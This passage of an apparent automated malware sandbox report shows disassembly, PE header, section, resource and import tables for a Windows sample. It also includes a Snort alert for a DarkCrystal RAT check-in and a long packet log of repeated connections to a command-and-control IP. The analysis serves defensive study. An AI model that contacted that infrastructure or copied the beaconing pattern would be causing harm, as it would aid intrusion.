test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FB4D4DA494Ch
push 0000000Ch
push esi
call 00007FB4D4DA3F09h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FB4D4D97582h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FB4D4DA7709h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FB4D4DA48C8h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FB4D4DA76ECh
int3
jmp 00007FB4D4DA9187h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.577.91.124.10149712802048095 11/21/23-04:47:24.543305	TCP	2048095	ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)	49712	80	192.168.2.5	77.91.124.101

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2023 04:47:24.170830011 CET	49712	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:24.367815971 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:24.367939949 CET	49712	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:24.543304920 CET	49712	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:24.740047932 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:24.740185022 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:24.741302967 CET	49712	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:24.938016891 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:25.036397934 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:25.036421061 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:25.036478996 CET	49712	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:25.036513090 CET	49712	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:26.359703064 CET	49712	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:26.485256910 CET	49713	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:26.557750940 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:26.558056116 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:26.558262110 CET	49712	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:26.683543921 CET	80	49713	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:26.683660030 CET	49713	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:26.683871984 CET	49713	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:26.758224010 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:26.762336969 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:26.782782078 CET	49712	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:26.881592035 CET	80	49713	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:26.881618023 CET	80	49713	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:26.881994009 CET	49713	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:26.982052088 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:26.982301950 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:26.982625008 CET	49712	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:27.079488993 CET	80	49713	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.079508066 CET	80	49713	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.085913897 CET	80	49713	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.179675102 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.184570074 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.215053082 CET	49712	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:27.216219902 CET	49714	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:27.219638109 CET	49713	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:27.411823034 CET	80	49712	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.412080050 CET	49712	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:27.412601948 CET	80	49714	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.412683964 CET	49714	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:27.412916899 CET	49714	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:27.416953087 CET	80	49713	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.417025089 CET	49713	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:27.609357119 CET	80	49714	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.609544992 CET	80	49714	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.609765053 CET	49714	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:27.806305885 CET	80	49714	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.806318998 CET	80	49714	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.814687014 CET	80	49714	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:27.869221926 CET	49714	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:27.932182074 CET	49715	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:28.130470991 CET	80	49715	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:28.130537033 CET	49715	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:28.130729914 CET	49715	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:28.329829931 CET	80	49715	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:28.329854012 CET	80	49715	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:28.330218077 CET	49715	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:28.527766943 CET	80	49715	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:28.527823925 CET	80	49715	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:28.534405947 CET	80	49715	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:28.588053942 CET	49715	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:28.650906086 CET	49715	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:28.651735067 CET	49716	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:28.851634979 CET	80	49716	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:28.851746082 CET	49716	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:28.852116108 CET	49716	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:28.852128983 CET	80	49715	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:28.852185965 CET	49715	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:29.049665928 CET	80	49716	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:29.050067902 CET	80	49716	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:29.050301075 CET	49716	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:29.251455069 CET	80	49716	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:29.251808882 CET	80	49716	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:29.257055044 CET	80	49716	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:29.306643963 CET	49716	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:29.382476091 CET	49716	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:29.382903099 CET	49717	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:29.580264091 CET	80	49716	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:29.580368042 CET	49716	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:29.580442905 CET	80	49717	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:29.580533981 CET	49717	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:29.580786943 CET	49717	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:29.778312922 CET	80	49717	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:29.778557062 CET	80	49717	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:29.778968096 CET	49717	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:29.976651907 CET	80	49717	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:29.976669073 CET	80	49717	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:29.983077049 CET	80	49717	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:30.025494099 CET	49717	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:30.101665974 CET	49717	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:30.102051973 CET	49718	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:30.298654079 CET	80	49718	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:30.298784018 CET	49718	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:30.299001932 CET	49718	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:30.299313068 CET	80	49717	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:30.299391985 CET	49717	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:30.495551109 CET	80	49718	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:30.495738983 CET	80	49718	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:30.495970964 CET	49718	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:30.692838907 CET	80	49718	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:30.692857027 CET	80	49718	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:30.699763060 CET	80	49718	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:30.744158983 CET	49718	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:30.821105957 CET	49718	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:30.821549892 CET	49719	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:31.017972946 CET	80	49718	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:31.018115997 CET	49718	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:31.018867970 CET	80	49719	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:31.018958092 CET	49719	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:31.019237995 CET	49719	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:31.220550060 CET	80	49719	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:31.220777988 CET	80	49719	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:31.221050024 CET	49719	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:31.418498039 CET	80	49719	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:31.418519020 CET	80	49719	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:31.425097942 CET	80	49719	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:31.478527069 CET	49719	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:31.555133104 CET	49714	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:31.560230017 CET	49719	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:31.560805082 CET	49720	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:31.757649899 CET	80	49719	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:31.757742882 CET	49719	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:31.758568048 CET	80	49720	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:31.758636951 CET	49720	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:31.758867979 CET	49720	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:31.958369017 CET	80	49720	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:31.958381891 CET	80	49720	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:31.958623886 CET	49720	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:32.163883924 CET	80	49720	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.163897038 CET	80	49720	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.168170929 CET	80	49720	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.198146105 CET	49721	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:32.212902069 CET	49720	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:32.295423985 CET	49722	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:32.396799088 CET	80	49721	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.396950960 CET	49721	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:32.397201061 CET	49721	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:32.492626905 CET	80	49722	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.492827892 CET	49722	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:32.493082047 CET	49722	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:32.596533060 CET	80	49721	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.596981049 CET	80	49721	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.597275019 CET	49721	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:32.690073967 CET	80	49722	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.690172911 CET	80	49722	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.690422058 CET	49722	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:32.795871019 CET	80	49721	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.795886993 CET	80	49721	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.802401066 CET	80	49721	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.853647947 CET	49721	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:32.887752056 CET	80	49722	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.887756109 CET	80	49722	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.893771887 CET	80	49722	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:32.947360039 CET	49722	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.024019003 CET	49721	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.024043083 CET	49720	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.024182081 CET	49722	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.024732113 CET	49723	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.222235918 CET	80	49722	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:33.222397089 CET	49722	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.222557068 CET	80	49720	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:33.222608089 CET	49720	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.222876072 CET	80	49723	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:33.222959995 CET	49723	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.223157883 CET	49723	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.223634005 CET	80	49721	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:33.223684072 CET	49721	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.420738935 CET	80	49723	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:33.420999050 CET	80	49723	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:33.421247959 CET	49723	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.618938923 CET	80	49723	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:33.625627041 CET	80	49723	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:33.666075945 CET	49723	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.752722979 CET	49724	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.951730967 CET	80	49724	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:33.951821089 CET	49724	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:33.952024937 CET	49724	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:34.148416996 CET	80	49724	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:34.148653030 CET	80	49724	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:34.148940086 CET	49724	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:34.351747036 CET	80	49724	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:34.351785898 CET	80	49724	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:34.355681896 CET	80	49724	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:34.400476933 CET	49724	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:34.479502916 CET	49724	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:34.480133057 CET	49725	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:34.676223993 CET	80	49724	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:34.676398993 CET	49724	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:34.677706957 CET	80	49725	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:34.677783966 CET	49725	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:34.678030968 CET	49725	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:34.875463963 CET	80	49725	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:34.875669003 CET	80	49725	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:34.875929117 CET	49725	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:35.073908091 CET	80	49725	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:35.073930025 CET	80	49725	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:35.080408096 CET	80	49725	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:35.134809971 CET	49725	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:35.200479031 CET	49725	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:35.200953007 CET	49726	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:35.397361994 CET	80	49726	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:35.397461891 CET	49726	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:35.397778988 CET	49726	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:35.398185015 CET	80	49725	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:35.398250103 CET	49725	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:35.594203949 CET	80	49726	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:35.594356060 CET	80	49726	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:35.594820023 CET	49726	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:35.791397095 CET	80	49726	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:35.791412115 CET	80	49726	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:35.797945976 CET	80	49726	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:35.853562117 CET	49726	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:35.915481091 CET	49726	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:35.915920973 CET	49727	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:36.111917019 CET	80	49726	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:36.112020016 CET	49726	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:36.113404036 CET	80	49727	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:36.113504887 CET	49727	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:36.113682032 CET	49727	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:36.311201096 CET	80	49727	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:36.311444998 CET	80	49727	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:36.311707973 CET	49727	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:36.509531975 CET	80	49727	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:36.509562969 CET	80	49727	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:36.515629053 CET	80	49727	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:36.556971073 CET	49727	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:36.635565996 CET	49727	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:36.636056900 CET	49728	80	192.168.2.5	77.91.124.101
Nov 21, 2023 04:47:36.833107948 CET	80	49727	77.91.124.101	192.168.2.5
Nov 21, 2023 04:47:36.833302021 CET	49727	80	192.168.2.5	77.91.124.101
